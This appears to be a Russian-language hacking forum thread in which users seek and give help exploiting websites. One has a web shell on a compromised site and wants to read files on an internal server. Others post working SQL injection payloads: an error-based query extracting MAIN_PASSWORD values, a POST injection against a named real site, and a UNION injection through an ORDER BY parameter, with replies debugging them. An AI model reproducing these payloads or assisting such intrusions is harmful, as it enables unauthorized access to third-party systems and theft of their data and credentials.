Попробую более детально описать ситуацию. Есть сайт залитый шелл но права там нищенские а именно:exec,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system все активные команды заблокированы. Есть второй сайт, который работает в локалке(из вне не доступен). Могу читать конфиг и.т.д этого сайта через mysql load file, но нужно узнать какие именно файлы расположены в директории этого сайта. Какими способами можно вообще получить такие данные, бэк не катит уже, всю голову переломал, за лучший ответ который поможет прочитать в папке этой файлы 5$ дам) Забыл упомянуть (48 ( apache ) Group: 513 ( ? )) из папки не выйти права 0751
попробую тогда болие корректно изложится, если прова позволяют, то можно "ПОПРОБОВАТЬ" средствами пхп просмотреть, что находится в папке!
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это: В чем может быть причина? мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же. PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
Во-первых, blabla - строковая константа, а потому должна обрамляться кавычками с двух сторон для корректности запроса. Если blabla - реально существуюший стобец, тогда не надо. Но я подозреваю, что он не существует. Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
'+and+(SeLeCt+1+FrOm(SeLeCt+count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt+CoNcAt(char(33,126,33),MAIN_PASSWORD,char(33,126,33))+FrOm+currency+LiMiT+15,1))+FrOm+information_schema.TaBlEs+LiMiT+0,1),floor(rand(0)*2))x+FrOm+information_schema.TaBlEs+GrOuP+By+x)a)+and+'1'='1 выводит: Subquery returns more than 1 row как правильно составить)?
http://www.menschenrechte.ac.at/db/suche/bib_erg.php post запрос PHP: schlag1=--+Bitte+ausw%E4hlen+--&op1=AND&schlagtext2=&schlag2=--+Bitte+ausw%E4hlen+--&op2=ANDschlag3=--+Bitte+ausw%E4hlen+--&bib_suche=Suche+starten&autor=aaa' Помогите раскрутить...
Все мануалы прокурил не могу составить, завис к тому же на ошибке: Operand should contain 1 column(s). Можешь все же помочь с составлением правильного запроса?! Все решил задачу эту, спасибо.
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу. Например даю запрос union select 1,2,login from users limit 1,1 Выводить одну запись, можно зделать запрос что б вывело несколько?
Нашел скулю, запрос http://xxx.com/cat/15?order=id&order_type=DESC Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC Выводит A Database Error Occurred Error Number: 1221 Incorrect usage of UNION and ORDER BY SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50 Помогите дальше раскрутить.
единственное, что сам сделал, так это 15?order=(id*1) и 15?order=(id*-1) но вытащить никакие данные не могу
может стоит начать со статей по sqli? можно, заодно, пройти челлендж, чтобы лучше понять https://forum.antichat.ru/threads/423579/
Спасибо за совет, статьи читал конечно же, в гугле смотрел, но сам не смог разобраться, поэтому и спросил в этой теме.
уязвимый параметр в ORDER BY. крутить либо как blind, либо https://rdot.org/forum/showthread.php?t=2865, либо, добавив LIMIT, использовать это: https://rdot.org/forum/showpost.php?p=36186&postcount=30
